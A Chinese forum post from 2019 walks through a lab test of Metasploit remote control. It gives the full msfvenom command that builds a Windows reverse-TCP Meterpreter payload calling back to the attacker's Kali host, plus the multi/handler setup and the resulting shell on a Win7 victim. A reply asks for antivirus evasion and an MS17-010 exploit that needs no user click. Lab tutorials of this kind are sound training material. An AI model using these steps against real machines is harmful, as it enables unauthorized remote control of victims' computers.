一次简单的Meterpreter远程控制测试

逸辰   ·   发表于 2019-04-15 23:58:07   ·   技术文章投稿区

一次简单的Meterpreter测试

一、 正向控制:1)被控端(被攻击者)执行了控制软件打开远程控制服务端 

          2)主控端(攻击者)需知道被控端IP

反向控制:受害人执行了控制软件被控制之后会主动告诉控制端自己已被控制(即主控方不需要知道对方IP)

二、 使用Kali Linux 2作为主控端(192.168.157.128)

Win 7作为被控端(192.168.157.129)

三、 步骤和实施

利用kali Metasploit的一个功能Msfvenom命令,生成playload.exe,靶机win7在执行playload后,kali即可实现对其控制。


Msfvenom的几个常见参数:


Options:

-p, --playload   <playload>指定要生成的playload(攻击载荷)

-f, --format     <format>指定输出格式(--help-formats可获取msf支持的输出格式列表)

-o, --out       <path>指定存储playload的位置

--playload-options     列举playload的标准选项

--help-formats  查看msf支持的输出格式列表


这里生成一个简单的被控端程序,使用参数-p,-f,-o指定要使用的被控端程序、要应用的平台,保存的位置。

root@hewanqiu:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.157.128 lport=5000 -f exe -o /root/playload.exe

(windows/meterpreter/reverse_tcp是一个用于windows平台下的反向远程控制程序 #:msfvenon –l playloads可查看所有可使用的playload)

之后我们还需要一个主控端,在kali上启动一个远程控制文件的主控端:

在终端输入msfconsole启动metasploit(不必在意图像,图像不固定),在metasploit中使用handle作为主控端,handle位于exloit下的multi目录中:

use exploit/multi/handler

设置playload为windows/meterpreter/reverse_tcp

设置lhost为192.168.157.128

设置lport为5000

即和刚刚的被控端程序保持一致

然后exploit等待对方上线

win7上双击执行playload.exe,返回kali即可看到metasploit打开了一个session

shell进入cmd,ipconfig成功执行。


文本打包了,喜欢的可以下载下来看,哈哈。


打赏我,让我更有动力~

Attachment List

Meterpreter.zip   File Size:0.54M (Download Count:8)

2 Reply   |  Until 2019-6-12 | 2218 View

jazzin1990
发表于 2019-4-16

大佬。没多重编码免杀没用的呀呜呜,而且很少有人能点开exe。

能不能写一个用ms17-010这类的漏洞,直接远程控制,不点开软件的这种?

膜拜!

评论列表

  • 加载数据中...

编写评论内容

ljxzy123
发表于 2019-6-12

学习学习学习

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.